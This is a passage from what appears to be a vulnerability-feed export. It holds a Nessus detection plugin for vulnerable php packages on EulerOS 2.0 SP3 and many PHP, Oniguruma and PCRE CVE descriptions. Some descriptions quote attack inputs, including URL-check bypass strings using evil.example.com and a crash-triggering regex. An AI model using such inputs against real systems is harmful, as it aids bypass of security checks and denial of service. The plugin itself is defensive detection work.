execution path that leaves a critical local variable\n uninitialized until it's used as an index, resulting in\n an out-of-bounds write memory\n corruption.(CVE-2017-9228)\n\n - An issue was discovered in Oniguruma 6.2.0, as used in\n Oniguruma-mod in Ruby through 2.4.1 and mbstring in PHP\n through 7.1.5. A heap out-of-bounds write or read\n occurs in next_state_val() during regular expression\n compilation. Octal numbers larger than 0xff are not\n handled correctly in fetch_token() and\n fetch_token_in_cc(). A malformed regular expression\n containing an octal number in the form of '\\700' would\n produce an invalid code point value larger than 0xff in\n next_state_val(), resulting in an out-of-bounds write\n memory corruption.(CVE-2017-9226)\n\n - An issue was discovered in Oniguruma 6.2.0, as used in\n Oniguruma-mod in Ruby through 2.4.1 and mbstring in PHP\n through 7.1.5. A SIGSEGV occurs in\n left_adjust_char_head() during regular expression\n compilation. Invalid handling of reg->dmax in\n forward_search_range() could result in an invalid\n pointer dereference, normally as an immediate\n denial-of-service condition.(CVE-2017-9229)\n\n - An issue was discovered in Oniguruma 6.2.0, as used in\n Oniguruma-mod in Ruby through 2.4.1 and mbstring in PHP\n through 7.1.5. A stack out-of-bounds read occurs in\n match_at() during regular expression searching. A\n logical error involving order of validation and access\n in match_at() could result in an out-of-bounds read\n from a stack buffer.(CVE-2017-9224)\n\n - An issue was discovered in Oniguruma 6.2.0, as used in\n Oniguruma-mod in Ruby through 2.4.1 and mbstring in PHP\n through 7.1.5. A stack out-of-bounds read occurs in\n mbc_enc_len() during regular expression searching.\n Invalid handling of reg->dmin in forward_search_range()\n could result in an invalid pointer dereference, as an\n out-of-bounds read from a stack buffer.(CVE-2017-9227)\n\n - An issue was discovered in PHP before 5.6.33, 7.0.x\n before 7.0.27, 7.1.x before 7.1.13, and 7.2.x before\n 7.2.1. There is Reflected XSS on the PHAR 404 error\n page via the URI of a request for a .phar\n file.(CVE-2018-5712)\n\n - An issue was discovered in PHP before 5.6.35, 7.0.x\n before 7.0.29, 7.1.x before 7.1.16, and 7.2.x before\n 7.2.4. Dumpable FPM child processes allow bypassing\n opcache access controls because fpm_unix.c makes a\n PR_SET_DUMPABLE prctl call, allowing one user (in a\n multiuser environment) to obtain sensitive information\n from the process memory of a second user's PHP\n applications by running gcore on the PID of the PHP-FPM\n worker process.(CVE-2018-10545)\n\n - Directory traversal vulnerability in the PharData class\n in PHP before 5.4.44, 5.5.x before 5.5.28, and 5.6.x\n before 5.6.12 allows remote attackers to write to\n arbitrary files via a .. (dot dot) in a ZIP archive\n entry that is mishandled during an extractTo\n call.(CVE-2015-6833)\n\n - Directory traversal vulnerability in the\n ZipArchive::extractTo function in ext/zip/php_zip.c in\n PHP before 5.4.45, 5.5.x before 5.5.29, and 5.6.x\n before 5.6.13 and ext/zip/ext_zip.cpp in HHVM before\n 3.12.1 allows remote attackers to create arbitrary\n empty directories via a crafted ZIP\n archive.(CVE-2014-9767)\n\n - exif_process_IFD_in_MAKERNOTE in ext/exif/exif.c in PHP\n before 5.6.37, 7.0.x before 7.0.31, 7.1.x before\n 7.1.20, and 7.2.x before 7.2.8 allows remote attackers\n to cause a denial of service (out-of-bounds read and\n application crash) via a crafted JPEG\n file.(CVE-2018-14851)\n\n - ext/libxml/libxml.c in PHP before 5.5.22 and 5.6.x\n before 5.6.6, when PHP-FPM is used, does not isolate\n each thread from libxml_disable_entity_loader changes\n in other threads, which allows remote attackers to\n conduct XML External Entity (XXE) and XML Entity\n Expansion (XEE) attacks via a crafted XML document, a\n related issue to CVE-2015-5161.(CVE-2015-8866)\n\n - ext/mysqlnd/mysqlnd_wireprotocol.c in PHP before 5.6.26\n and 7.x before 7.0.11 does not verify that a BIT field\n has the UNSIGNED_FLAG flag, which allows remote MySQL\n servers to cause a denial of service (heap-based buffer\n overflow) or possibly have unspecified other impact via\n crafted field metadata.(CVE-2016-7412)\n\n - ext/session/session.c in PHP before 5.6.25 and 7.x\n before 7.0.10 skips invalid session names in a way that\n triggers incorrect parsing, which allows remote\n attackers to inject arbitrary-type session data by\n leveraging control of a session name, as demonstrated\n by object injection.(CVE-2016-7125)\n\n - ext/standard/var_unserializer.c in PHP before 5.6.25\n and 7.x before 7.0.10 mishandles certain invalid\n objects, which allows remote attackers to cause a\n denial of service or possibly have unspecified other\n impact via crafted serialized data that leads to a (1)\n __destruct call or (2) magic method\n call.(CVE-2016-7124)\n\n - ext/standard/var_unserializer.re in PHP before 5.6.26\n mishandles object-deserialization failures, which\n allows remote attackers to cause a denial of service\n (memory corruption) or possibly have unspecified other\n impact via an unserialize call that references a\n partially constructed object.(CVE-2016-7411)\n\n - ext/wddx/wddx.c in PHP before 5.6.28 and 7.x before\n 7.0.13 allows remote attackers to cause a denial of\n service (NULL pointer dereference) via crafted\n serialized data in a wddxPacket XML document, as\n demonstrated by a PDORow string.(CVE-2016-9934)\n\n - gd_gif_in.c in the GD Graphics Library (aka libgd), as\n used in PHP before 5.6.33, 7.0.x before 7.0.27, 7.1.x\n before 7.1.13, and 7.2.x before 7.2.1, has an integer\n signedness error that leads to an infinite loop via a\n crafted GIF file, as demonstrated by a call to the\n imagecreatefromgif or imagecreatefromstring PHP\n function. This is related to GetCode_ and\n gdImageCreateFromGifCtx.(CVE-2018-5711)\n\n - In PHP before 5.6.28 and 7.x before 7.0.13, incorrect\n handling of various URI components in the URL parser\n could be used by attackers to bypass hostname-specific\n URL checks, as demonstrated by\n evil.example.com:80#@good.example.com/ and\n evil.example.com:80?@good.example.com/ inputs to the\n parse_url function (implemented in the php_url_parse_ex\n function in ext/standard/url.c).(CVE-2016-10397)\n\n - In PHP before 5.6.30 and 7.x before 7.0.15, the PHAR\n archive handler could be used by attackers supplying\n malicious archive files to crash the PHP interpreter or\n potentially disclose information due to a buffer\n over-read in the phar_parse_pharfile function in\n ext/phar/phar.c.(CVE-2017-11147)\n\n - In PHP before 5.6.31, 7.x before 7.0.21, and 7.1.x\n before 7.1.7, a stack-based buffer overflow in the\n zend_ini_do_op() function in Zend/zend_ini_parser.c\n could cause a denial of service or potentially allow\n executing code. NOTE: this is only relevant for PHP\n applications that accept untrusted input (instead of\n the system's php.ini file) for the parse_ini_string or\n parse_ini_file function, e.g., a web application for\n syntax validation of php.ini\n directives.(CVE-2017-11628)\n\n - In PHP before 5.6.31, 7.x before 7.0.21, and 7.1.x\n before 7.1.7, the openssl extension PEM sealing code\n did not check the return value of the OpenSSL sealing\n function, which could lead to a crash of the PHP\n interpreter, related to an interpretation conflict for\n a negative number in ext/openssl/openssl.c, and an\n OpenSSL documentation omission.(CVE-2017-11144)\n\n - In PHP before 5.6.31, an invalid free in the WDDX\n deserialization of boolean parameters could be used by\n attackers able to inject XML for deserialization to\n crash the PHP interpreter, related to an invalid free\n for an empty boolean element in\n ext/wddx/wddx.c.(CVE-2017-11143)\n\n - In PHP before 5.6.32, 7.x before 7.0.25, and 7.1.x\n before 7.1.11, an error in the date extension's\n timelib_meridian handling of 'front of' and 'back of'\n directives could be used by attackers able to supply\n date strings to leak information from the interpreter,\n related to ext/date/lib/parse_date.c out-of-bounds\n reads affecting the php_parse_date function. NOTE: this\n is a different issue than\n CVE-2017-11145.(CVE-2017-16642)\n\n - In PHP versions 7.1.x below 7.1.33, 7.2.x below 7.2.24\n and 7.3.x below 7.3.11 in certain configurations of FPM\n setup it is possible to cause FPM module to write past\n allocated buffers into the space reserved for FCGI\n protocol data, thus opening the possibility of remote\n code execution.(CVE-2019-11043)\n\n - Integer overflow in the phar_parse_pharfile function in\n ext/phar/phar.c in PHP before 5.6.30 and 7.0.x before\n 7.0.15 allows remote attackers to cause a denial of\n service (memory consumption or application crash) via a\n truncated manifest entry in a PHAR\n archive.(CVE-2016-10159)\n\n - Integer overflow in the php_html_entities function in\n ext/standard/html.c in PHP before 5.5.36 and 5.6.x\n before 5.6.22 allows remote attackers to cause a denial\n of service or possibly have unspecified other impact by\n triggering a large output string from the\n htmlspecialchars function.(CVE-2016-5094)\n\n - Multiple use-after-free vulnerabilities in SPL in PHP\n before 5.4.44, 5.5.x before 5.5.28, and 5.6.x before\n 5.6.12 allow remote attackers to execute arbitrary code\n via vectors involving (1) ArrayObject, (2)\n SplObjectStorage, and (3) SplDoublyLinkedList, which\n are mishandled during unserialization.(CVE-2015-6831)\n\n - Off-by-one error in the phar_parse_zipfile function in\n ext/phar/zip.c in PHP before 5.5.30 and 5.6.x before\n 5.6.14 allows remote attackers to cause a denial of\n service (uninitialized pointer dereference and\n application crash) by including the / filename in a\n .zip PHAR archive.(CVE-2015-7804)\n\n - PHP through 7.1.11 enables potential SSRF in\n applications that accept an fsockopen or pfsockopen\n hostname argument with an expectation that the port\n number is constrained. Because a :port syntax is\n recognized, fsockopen will use the port number that is\n specified in the hostname argument, instead of the port\n number in the second argument of the\n function.(CVE-2017-7272)\n\n - Session fixation vulnerability in the Sessions\n subsystem in PHP before 5.5.2 allows remote attackers\n to hijack web sessions by specifying a session\n ID.(CVE-2011-4718)\n\n - Stack consumption vulnerability in GD in PHP before\n 5.6.12 allows remote attackers to cause a denial of\n service via a crafted imagefilltoborder\n call.(CVE-2015-8874)\n\n - Stack-based buffer overflow in ext/phar/tar.c in PHP\n before 5.5.32, 5.6.x before 5.6.18, and 7.x before\n 7.0.3 allows remote attackers to cause a denial of\n service (application crash) or possibly have\n unspecified other impact via a crafted TAR\n archive.(CVE-2016-2554)\n\n - The Apache2 component in PHP before 5.6.38, 7.0.x\n before 7.0.32, 7.1.x before 7.1.22, and 7.2.x before\n 7.2.10 allows XSS via the body of a 'Transfer-Encoding:\n chunked' request, because the bucket brigade is\n mishandled in the php_handler function in\n sapi/apache2handler/sapi_apache2.c.(CVE-2018-17082)\n\n - The exif_convert_any_to_int function in ext/exif/exif.c\n in PHP before 5.6.30, 7.0.x before 7.0.15, and 7.1.x\n before 7.1.1 allows remote attackers to cause a denial\n of service (application crash) via crafted EXIF data\n that triggers an attempt to divide the minimum\n representable negative integer by -1.(CVE-2016-10158)\n\n - The exif_process_IFD_in_JPEG function in\n ext/exif/exif.c in PHP before 5.5.35, 5.6.x before\n 5.6.21, and 7.x before 7.0.6 does not validate IFD\n sizes, which allows remote attackers to cause a denial\n of service (out-of-bounds read) or possibly have\n unspecified other impact via crafted header\n data.(CVE-2016-4543)\n\n - The exif_process_IFD_in_MAKERNOTE function in\n ext/exif/exif.c in PHP before 5.5.38, 5.6.x before\n 5.6.24, and 7.x before 7.0.9 allows remote attackers to\n cause a denial of service (out-of-bounds array access\n and memory corruption), obtain sensitive information\n from process memory, or possibly have unspecified other\n impact via a crafted JPEG image.(CVE-2016-6291)\n\n - The exif_process_IFD_in_TIFF function in\n ext/exif/exif.c in PHP before 5.6.25 and 7.x before\n 7.0.10 mishandles the case of a thumbnail offset that\n exceeds the file size, which allows remote attackers to\n obtain sensitive information from process memory via a\n crafted TIFF image.(CVE-2016-7128)\n\n - The exif_process_IFD_TAG function in ext/exif/exif.c in\n PHP before 5.5.35, 5.6.x before 5.6.21, and 7.x before\n 7.0.6 does not properly construct spprintf arguments,\n which allows remote attackers to cause a denial of\n service (out-of-bounds read) or possibly have\n unspecified other impact via crafted header\n data.(CVE-2016-4542)\n\n - The exif_process_user_comment function in\n ext/exif/exif.c in PHP before 5.5.38, 5.6.x before\n 5.6.24, and 7.x before 7.0.9 allows remote attackers to\n cause a denial of service (NULL pointer dereference and\n application crash) via a crafted JPEG\n image.(CVE-2016-6292)\n\n - The finish_nested_data function in\n ext/standard/var_unserializer.re in PHP before 5.6.31,\n 7.0.x before 7.0.21, and 7.1.x before 7.1.7 is prone to\n a buffer over-read while unserializing untrusted data.\n Exploitation of this issue can have an unspecified\n impact on the integrity of PHP.(CVE-2017-12933)\n\n - The get_icu_disp_value_src_php function in\n ext/intl/locale/locale_methods.c in PHP before 5.3.29,\n 5.4.x before 5.4.30, and 5.5.x before 5.5.14 does not\n properly restrict calls to the ICU uresbund.cpp\n component, which allows remote attackers to cause a\n denial of service (buffer overflow) or possibly have\n unspecified other impact via a locale_get_display_name\n call with a long first argument.(CVE-2014-9912)\n\n - The get_icu_value_internal function in\n ext/intl/locale/locale_methods.c in PHP before 5.5.36,\n 5.6.x before 5.6.22, and 7.x before 7.0.7 does not\n ensure the presence of a '\\0' character, which allows\n remote attackers to cause a denial of service\n (out-of-bounds read) or possibly have unspecified other\n impact via a crafted locale_get_primary_language\n call.(CVE-2016-5093)\n\n - The grapheme_stripos function in\n ext/intl/grapheme/grapheme_string.c in PHP before\n 5.5.35, 5.6.x before 5.6.21, and 7.x before 7.0.6\n allows remote attackers to cause a denial of service\n (out-of-bounds read) or possibly have unspecified other\n impact via a negative offset.(CVE-2016-4540)\n\n - The grapheme_strpos function in\n ext/intl/grapheme/grapheme_string.c in PHP before\n 5.5.35, 5.6.x before 5.6.21, and 7.x before 7.0.6\n allows remote attackers to cause a denial of service\n (out-of-bounds read) or possibly have unspecified other\n impact via a negative offset.(CVE-2016-4541)\n\n - The locale_accept_from_http function in\n ext/intl/locale/locale_methods.c in PHP before 5.5.38,\n 5.6.x before 5.6.24, and 7.x before 7.0.9 does not\n properly restrict calls to the ICU\n uloc_acceptLanguageFromHTTP function, which allows\n remote attackers to cause a denial of service\n (out-of-bounds read) or possibly have unspecified other\n impact via a call with a long argument.(CVE-2016-6294)\n\n - The make_http_soap_request function in\n ext/soap/php_http.c in PHP before 5.4.44, 5.5.x before\n 5.5.28, 5.6.x before 5.6.12, and 7.x before 7.0.4\n allows remote attackers to obtain sensitive information\n from process memory or cause a denial of service (type\n confusion and application crash) via crafted serialized\n _cookies data, related to the SoapClient::__call method\n in ext/soap/soap.c.(CVE-2016-3185)\n\n - The make_http_soap_request function in\n ext/soap/php_http.c in PHP before 5.4.44, 5.5.x before\n 5.5.28, and 5.6.x before 5.6.12 does not properly\n retrieve keys, which allows remote attackers to cause a\n denial of service (NULL pointer dereference, type\n confusion, and application crash) or possibly execute\n arbitrary code via crafted serialized data representing\n a numerically indexed _cookies array, related to the\n SoapClient::__call method in\n ext/soap/soap.c.(CVE-2015-8835)\n\n - The object_common1 function in\n ext/standard/var_unserializer.c in PHP before 5.6.30,\n 7.0.x before 7.0.15, and 7.1.x before 7.1.1 allows\n remote attackers to cause a denial of service (buffer\n over-read and application crash) via crafted serialized\n data that is mishandled in a finish_nested_data\n call.(CVE-2016-10161)\n\n - The odbc_bindcols function in ext/odbc/php_odbc.c in\n PHP before 5.6.12 mishandles driver behavior for\n SQL_WVARCHAR columns, which allows remote attackers to\n cause a denial of service (application crash) in\n opportunistic circumstances by leveraging use of the\n odbc_fetch_array function to access a certain type of\n Microsoft SQL Server table.(CVE-2015-8879)\n\n - The phar_convert_to_other function in\n ext/phar/phar_object.c in PHP before 5.4.43, 5.5.x\n before 5.5.27, and 5.6.x before 5.6.11 does not\n validate a file pointer before a close operation, which\n allows remote attackers to cause a denial of service\n (segmentation fault) or possibly have unspecified other\n impact via a crafted TAR archive that is mishandled in\n a Phar::convertToData call.(CVE-2015-5589)\n\n - The phar_get_entry_data function in ext/phar/util.c in\n PHP before 5.5.30 and 5.6.x before 5.6.14 allows remote\n attackers to cause a denial of service (NULL pointer\n dereference and application crash) via a .phar file\n with a crafted TAR archive entry in which the Link\n indicator references a file that does not\n exist.(CVE-2015-7803)\n\n - The phar_parse_zipfile function in zip.c in the PHAR\n extension in PHP before 5.5.33 and 5.6.x before 5.6.19\n allows remote attackers to obtain sensitive information\n from process memory or cause a denial of service\n (out-of-bounds read and application crash) by placing a\n PK\\x05\\x06 signature at an invalid\n location.(CVE-2016-3142)\n\n - The php_url_parse_ex function in ext/standard/url.c in\n PHP before 5.5.38 allows remote attackers to cause a\n denial of service (buffer over-read) or possibly have\n unspecified other impact via vectors involving the\n smart_str data type.(CVE-2016-6288)\n\n - The php_wddx_push_element function in ext/wddx/wddx.c\n in PHP before 5.6.26 and 7.x before 7.0.11 allows\n remote attackers to cause a denial of service (invalid\n pointer access and out-of-bounds read) or possibly have\n unspecified other impact via an incorrect boolean\n element in a wddxPacket XML document, leading to\n mishandling in a wddx_deserialize call.(CVE-2016-7418)\n\n - The php_wddx_push_element function in ext/wddx/wddx.c\n in PHP before 5.6.29 and 7.x before 7.0.14 allows\n remote attackers to cause a denial of service\n (out-of-bounds read and memory corruption) or possibly\n have unspecified other impact via an empty boolean\n element in a wddxPacket XML document.(CVE-2016-9935)\n\n - The sapi_header_op function in main/SAPI.c in PHP\n before 5.4.38, 5.5.x before 5.5.22, and 5.6.x before\n 5.6.6 supports deprecated line folding without\n considering browser compatibility, which allows remote\n attackers to conduct cross-site scripting (XSS) attacks\n against Internet Explorer by leveraging (1) %0A%20 or\n (2) %0D%0A%20 mishandling in the header\n function.(CVE-2015-8935)\n\n - The SplObjectStorage unserialize implementation in\n ext/spl/spl_observer.c in PHP before 7.0.12 does not\n verify that a key is an object, which allows remote\n attackers to execute arbitrary code or cause a denial\n of service (uninitialized memory access) via crafted\n serialized data.(CVE-2016-7480)\n\n - The xml_parse_into_struct function in ext/xml/xml.c in\n PHP before 5.5.35, 5.6.x before 5.6.21, and 7.x before\n 7.0.6 allows remote attackers to cause a denial of\n service (buffer under-read and segmentation fault) or\n possibly have unspecified other impact via crafted XML\n data in the second argument, leading to a parser level\n of zero.(CVE-2016-4539)\n\n - The ZIP signature-verification feature in PHP before\n 5.6.26 and 7.x before 7.0.11 does not ensure that the\n uncompressed_filesize field is large enough, which\n allows remote attackers to cause a denial of service\n (out-of-bounds memory access) or possibly have\n unspecified other impact via a crafted PHAR archive,\n related to ext/phar/util.c and\n ext/phar/zip.c.(CVE-2016-7414)\n\n - Use-after-free vulnerability in the SPL unserialize\n implementation in ext/spl/spl_array.c in PHP before\n 5.4.44, 5.5.x before 5.5.28, and 5.6.x before 5.6.12\n allows remote attackers to execute arbitrary code via\n crafted serialized data that triggers misuse of an\n array field.(CVE-2015-6832)\n\n - Use-after-free vulnerability in the spl_ptr_heap_insert\n function in ext/spl/spl_heap.c in PHP before 5.5.27 and\n 5.6.x before 5.6.11 allows remote attackers to execute\n arbitrary code by triggering a failed\n SplMinHeap::compare operation.(CVE-2015-4116)\n\n - Use-after-free vulnerability in wddx.c in the WDDX\n extension in PHP before 5.5.33 and 5.6.x before 5.6.19\n allows remote attackers to cause a denial of service\n (memory corruption and application crash) or possibly\n have unspecified other impact by triggering a\n wddx_deserialize call on XML data containing a crafted\n var element.(CVE-2016-3141)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-2649\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?cd44f4b5\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected php packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-2554\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2019-11043\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'PHP-FPM Underflow RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/12/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/12/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:php\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:php-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:php-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:php-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:php-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:php-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:php-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:php-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:php-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:php-process\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:php-recode\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:php-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:php-xml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:php-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(3)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP3\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP3\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"php-5.4.16-42.h51\",\n \"php-cli-5.4.16-42.h51\",\n \"php-common-5.4.16-42.h51\",\n \"php-gd-5.4.16-42.h51\",\n \"php-ldap-5.4.16-42.h51\",\n \"php-mysql-5.4.16-42.h51\",\n \"php-odbc-5.4.16-42.h51\",\n \"php-pdo-5.4.16-42.h51\",\n \"php-pgsql-5.4.16-42.h51\",\n \"php-process-5.4.16-42.h51\",\n \"php-recode-5.4.16-42.h51\",\n \"php-soap-5.4.16-42.h51\",\n \"php-xml-5.4.16-42.h51\",\n \"php-xmlrpc-5.4.16-42.h51\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"3\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-06-17T15:30:36", "description": "According to the versions of the php packages installed, the EulerOS installation on the remote host is affected by the following vulnerabilities :\n\n - In PHP versions 7.1.x below 7.1.33, 7.2.x below 7.2.24 and 7.3.x below 7.3.11 in certain configurations of FPM setup it is possible to cause FPM module to write past allocated buffers into the space reserved for FCGI protocol data, thus opening the possibility of remote code execution.(CVE-2019-11043)\n\n - The finish_nested_data function in ext/standard/var_unserializer.re in PHP before 5.6.31, 7.0.x before 7.0.21, and 7.1.x before 7.1.7 is prone to a buffer over-read while unserializing untrusted data.\n Exploitation of this issue can have an unspecified impact on the integrity of PHP.(CVE-2017-12933)\n\n - ext/standard/var_unserializer.c in PHP before 5.6.25 and 7.x before 7.0.10 mishandles certain invalid objects, which allows remote attackers to cause a denial of service or possibly have unspecified other impact via crafted serialized data that leads to a (1)\n __destruct call or (2) magic method call.(CVE-2016-7124)\n\n - The match function in pcre_exec.c in PCRE before 8.37 mishandles the /(?:((abcd))|(((?:(?:(?:(?:abc|(?:abcdef))))b)abcdefghi )abc)|((*ACCEPT)))/ pattern and related patterns involving (*ACCEPT), which allows remote attackers to obtain sensitive information from process memory or cause a denial of service (partially initialized memory and application crash) via a crafted regular expression, as demonstrated by a JavaScript RegExp object encountered by Konqueror, aka ZDI-CAN-2547.(CVE-2015-8382)\n\n - An issue was discovered in PHP before 5.6.33, 7.0.x before 7.0.27, 7.1.x before 7.1.13, and 7.2.x before 7.2.1. There is Reflected XSS on the PHAR 404 error page via the URI of a request for a .phar file.(CVE-2018-5712)\n\n - exif_process_IFD_in_MAKERNOTE in ext/exif/exif.c in PHP before 5.6.37, 7.0.x before 7.0.31, 7.1.x before 7.1.20, and 7.2.x before 7.2.8 allows remote attackers to cause a denial of service (out-of-bounds read and application crash) via a crafted JPEG file.(CVE-2018-14851)\n\n - The SplObjectStorage unserialize implementation in ext/spl/spl_observer.c in PHP before 7.0.12 does not verify that a key is an object, which allows remote attackers to execute arbitrary code or cause a denial of service (uninitialized memory access) via crafted serialized data.(CVE-2016-7480)\n\n - ext/standard/var_unserializer.re in PHP before 5.6.26 mishandles object-deserialization failures, which allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via an unserialize call that references a partially constructed object.(CVE-2016-7411)\n\n - The odbc_bindcols function in ext/odbc/php_odbc.c in PHP before 5.6.12 mishandles driver behavior for SQL_WVARCHAR columns, which allows remote attackers to cause a denial of service (application crash) in opportunistic circumstances by leveraging use of the odbc_fetch_array function to access a certain type of Microsoft SQL Server table.(CVE-2015-8879)\n\n - In PHP before 5.6.32, 7.x before 7.0.25, and 7.1.x before 7.1.11, an error in the date extension's timelib_meridian handling of 'front of' and 'back of' directives could be used by attackers able to supply date strings to leak information from the interpreter, related to ext/date/lib/parse_date.c out-of-bounds reads affecting the php_parse_date function. NOTE: this is a different issue than CVE-2017-11145.(CVE-2017-16642)\n\n - The exif_process_IFD_in_JPEG function in ext/exif/exif.c in PHP before 5.5.35, 5.6.x before 5.6.21, and 7.x before 7.0.6 does not validate IFD sizes, which allows remote attackers to cause a denial of service (out-of-bounds read) or possibly have unspecified other impact via crafted header data.(CVE-2016-4543)\n\n - The exif_process_IFD_TAG function in ext/exif/exif.c in PHP before 5.5.35, 5.6.x before 5.6.21, and 7.x before 7.0.6 does not properly construct spprintf arguments, which allows remote attackers to cause a denial of service (out-of-bounds read) or possibly have unspecified other impact via crafted header data.(CVE-2016-4542)\n\n - The grapheme_strpos function in ext/intl/grapheme/grapheme_string.c in PHP before 5.5.35, 5.6.x before 5.6.21, and 7.x before 7.0.6 allows remote attackers to cause a denial of service (out-of-bounds read) or possibly have unspecified other impact via a negative offset.(CVE-2016-4541)\n\n - The grapheme_stripos function in ext/intl/grapheme/grapheme_string.c in PHP before 5.5.35, 5.6.x before 5.6.21, and 7.x before 7.0.6 allows remote attackers to cause a denial of service (out-of-bounds read) or possibly have unspecified other impact via a negative offset.(CVE-2016-4540)\n\n - The xml_parse_into_struct function in ext/xml/xml.c in PHP before 5.5.35, 5.6.x before 5.6.21, and 7.x before 7.0.6 allows remote attackers to cause a denial of service (buffer under-read and segmentation fault) or possibly have unspecified other impact via crafted XML data in the second argument, leading to a parser level of zero.(CVE-2016-4539)\n\n - ** DISPUTED ** Integer overflow in the php_raw_url_encode function in ext/standard/url.c in PHP before 5.5.34, 5.6.x before 5.6.20, and 7.x before 7.0.5 allows remote attackers to cause a denial of service (application crash) via a long string to the rawurlencode function. NOTE: the vendor says 'Not sure if this qualifies as security issue (probably not).'(CVE-2016-4070)\n\n - Use-after-free vulnerability in wddx.c in the WDDX extension in PHP before 5.5.33 and 5.6.x before 5.6.19 allows remote attackers to cause a denial of service (memory corruption and application crash) or possibly have unspecified other impact by triggering a wddx_deserialize call on XML data containing a crafted var element.(CVE-2016-3141)\n\n - In PHP before 5.6.28 and 7.x before 7.0.13, incorrect handling of various URI components in the URL parser could be used by attackers to bypass hostname-specific URL checks, as demonstrated by evil.example.com:80#@good.example.com/ and evil.example.com:80?@good.example.com/ inputs to the parse_url function (implemented in the php_url_parse_ex function in ext/standard/url.c).(CVE-2016-10397)\n\n - Multiple use-after-free vulnerabilities in SPL in PHP before 5.4.44, 5.5.x before 5.5.28, and 5.6.x before 5.6.12 allow remote attackers to execute arbitrary code via vectors involving (1) ArrayObject, 